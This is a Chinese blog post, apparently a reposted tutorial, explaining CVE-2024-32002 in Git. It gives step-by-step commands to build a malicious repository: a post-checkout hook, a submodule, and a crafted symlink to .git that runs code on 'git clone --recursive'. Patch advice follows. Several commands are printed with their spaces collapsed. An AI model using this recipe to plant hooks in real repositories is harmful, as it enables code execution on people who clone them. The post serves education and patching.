深入剖析CVE-2024–32002：通过git clone实现远程代码执行

Exploiting CVE-2024–32002: Git RCE via git clone

概述

首先，我们来了解一下这个漏洞。CVE-2024–32002 (CVSS 9.1) 是一个发生在 Git 中的严重级别（Critical）漏洞。攻击者通过git clone命令克隆一个恶意仓库，并且必须使用--recursive选项，即可实现远程代码执行（RCE）。这意味着攻击者可以从远程运行预先隐藏的命令。

受影响的版本：

• v2.45.0
• v2.44.0
• <= v2.43.3
• <= v2.42.1
• v2.41.0
• <= v2.40.1
• <= v2.39.3

已修补的版本：

• v2.45.1
• v2.44.1
• v2.43.4
• v2.42.2
• v2.41.1
• v2.40.2
• v2.39.4

该漏洞已于 2024 年 5 月 14 日星期二修补。

漏洞分析

根据官方公告：https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv

包含子模块的 Git 仓库可以创建一个路径，通过在.git/目录中写入文件（而不是写入子模块的工作区）来触发 Git 中的漏洞。这种方法允许写入钩子（hook）（一种在 Git 仓库中发生特定事件时自动运行的脚本）。在这种情况下，钩子将在运行git clone命令时执行，导致用户没有机会在代码运行前进行检查。

符号链接

符号链接（symlinks 或 symbolic links）是充当指向其他文件或目录指针的系统文件。在 Git 的上下文中，它可以从当前仓库引用其他部分。虽然这种方法很方便，但符号链接也可能被用于其他恶意目的，从而对系统产生负面影响。

演示环境设置

让我们从设置用于演示的机器上的 Git 配置开始，使用以下命令：

gitconfig--globalprotocol.file.allow alwaysgitconfig--globalcore.symlinkstrue

命令解释：

• git config --global protocol.file.allow always：此命令用于设置 Git 始终允许使用file://协议进行操作。
• git config --global core.symlinks true：此命令将设置 Git 能够创建和管理符号链接，而不是将其视为包含链接内容的普通文本文件。

在你的 GitHub 账户中创建两个空仓库用于测试，分别命名为git_rce和hook。

创建git_rce仓库：

创建hook仓库：

完成上述步骤后，从我们刚刚在 GitHub 上创建的仓库中git clone这两个仓库到你想要测试的机器上。

进入hook/目录，然后在其中创建y/目录和hooks/目录：

cdhook/mkdir-py/hooks

在hook目录中创建一个名为post-checkout的文件，并添加你想要执行的命令。在本文中，我们使用打开计算器的命令（适用于 Windows & Mac），以及将单词 “pwned!!” 写入/tmp目录中pwned文件的命令。

添加完我们想要的命令后，我们使post-checkout文件可执行，使用命令：

gitupdate-index--chmod=+x y/hooks/post-checkout

命令解释：

• git update-index：此命令将在提交到 Git 仓库之前，根据条件创建更改。
• --chmod=+x：这是git update-index命令的一个选项，用于指示 Git 更改文件的权限，使其可执行。
• y/hooks/post-checkout：需要更改权限的文件路径。

准备好所有文件后，使用以下命令推送到 hook 仓库：

gitadd.gitcommit-m"first commit"gitpush origin main

命令解释：

• git add .：此命令将当前目录中的所有文件添加到 Git，以便在下一步提交。
• git commit -m "first commit"：此命令将从前一个命令的快照文件中，并为每个文件附加消息或注释，以便于跟踪每个文件的更改历史。
• git push origin main：此命令将上传已提交的所有内容到我们链接的 Git 仓库，在本例中就是 hook 仓库。

回到之前我们git clone下来的git_rce目录。

利用过程

使用git submodule add命令将hook/仓库添加为此仓库的子模块：

gitsubmoduleadd--namex/y"git@github.com:Jockky-dev/hook.git"A/modules/x

命令解释：

• git submodule add：用于添加子模块，该子模块将引用另一个仓库，以便在当前仓库中工作。
• --name x/y：用于指定子模块在当前仓库中的引用名称，以便相互引用。其中x表示顶级目录或根目录（/），y表示子目录或将被调用的目录。
• git@github.com:Jockky-dev/hook.git：我们想要添加的子模块的 URL。
• A/modules/x：当前仓库中将用于克隆子模块的路径，其中A表示顶级目录（/），modules表示仓库内的子目录，x是子模块将被拉取到的路径。

添加子模块后，接下来是创建符号链接作为两个仓库之间的指针。

printf".git">dotgit.txtgithash-object-w--stdin<dotgit.txt>dot-git.hashprintf"120000 %s 0\ta\n""$(catdot-git.hash)">index.info

首先，创建一个名为dotgit.txt的文件，并将单词.git添加为内容。

命令解释git hash-object -w --stdin < dotgit.txt > dot-git.hash：

• git hash-object：用于计算指定文件的 SHA-1 哈希值的命令。
• -w：指示 Git 在计算哈希值后将文件写入 Git 对象数据库的选项。
• --stdin：指示 Git 从标准输入读取数据，而不是命令中指定的文件。
• < dotgit.txt：指定通过从dotgit.txt文件中提取内容作为输入，然后输入到git hash-object命令中。
• > dot-git.hash：指定将前一步的输出保存到dot-git.hash文件中。

命令解释printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info：

• printf：用于格式化并按需打印字符的命令。
• "120000 %s 0\ta\n"：
  • 120000：指定文件的权限模式，120000 表示指定为符号链接。
  • %s：从输入中获取（在本命令中是从dot-git.hash文件获取）并替换此位置的字符串。
  • 0：指定阶段号或提交前的版本，0 表示未包含其他分支、合并阶段提交的当前点。
  • \t：用于分隔或制表输出结果（使字符不连在一起）的转义序列。
  • a：符号链接将放置在仓库中的路径名称。
  • \n：用于在命令结束时换行。
• $(cat dot-git.hash)：读取dot-git.hash文件并将值替换到命令中%s位置的命令。
• > index.info：将命令的最终结果保存到index.info文件中。

注意：在 Git 中，每个文件都被指定为一个 SHA-1 哈希值。对于符号链接，它是一个指向之前创建的符号链接路径的链接。

运行上述命令后，我们将得到类似于图中示例的输出。

使用index.info文件作为输入来更新 Git 索引：

gitupdate-index --index-info<index.info

命令解释git update-index --index-info < index.info：

• git update-index：将在提交到 Git 仓库之前根据条件创建更改的命令。
• --index-info：指示 Git 从指定的输入中获取内容以用于命令的选项。
• < index.info：指定将用作前一个选项输入的文件名。
• git ls-files --stage：用于列出文件信息及其阶段，根据模式输出：<mode> <object hash> <stage>\t<path>。

准备好所有文件后，使用以下命令推送到git_rce仓库：

gitcommit-m"symbolic link added"gitpush origin main

检查git_rce和hook仓库中，我们上传的所有文件是否完成。

一切准备就绪后，我们就可以开始攻击了。

攻击演示

注意：别忘了在git clone命令中加入--recursive选项才能使漏洞利用生效。

gitclone--recursivegit@github.com:Jockky-dev/git_rce.git cve-2024-32002-exploited

修补（Patch）方法

1. 将 Git 更新到最新版本：

   • 对于 Windows：git update-git-for-windows
     
   • 对于 Linux (Unix)：

     sudoaptupdate-ysudoaptfull-upgrade-y

2. 在 Git 中禁用符号链接使用，使用命令：

   gitconfig--globalcore.symlinksfalse

3. 避免克隆来源未知的项目禁用 Git 中的符号链接使用（git config --global core.symlinks false），当然最好的方法是避免克隆来源未知的项目。

参考资料

• https://nvd.nist.gov/vuln/detail/CVE-2024-32002
• https://en.wikipedia.org/wiki/Symbolic_link
• https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv
• https://git-scm.com/docs/git-clone#Documentation/git-clone.txt—recurse-submodulesltpathspecgt
• https://git-scm.com/docs/git-config#Documentation/git-config.txt-coresymlinks
  CSD0tFqvECLokhw9aBeRqpG/NCS8B24x7B65YcX9iF1NeCL/Z53ORp+3P0Do0x1a8g7sfn9CmJcTbDE1x4LiM1WmIRQ6tP3HLOsYKttlyUd12HdNehSJOS1k7votv6hwMr7Acm8cnFc4S4U6o+wThOJcDmi58RHRL/l16BLw7Eo=
  更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
  对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）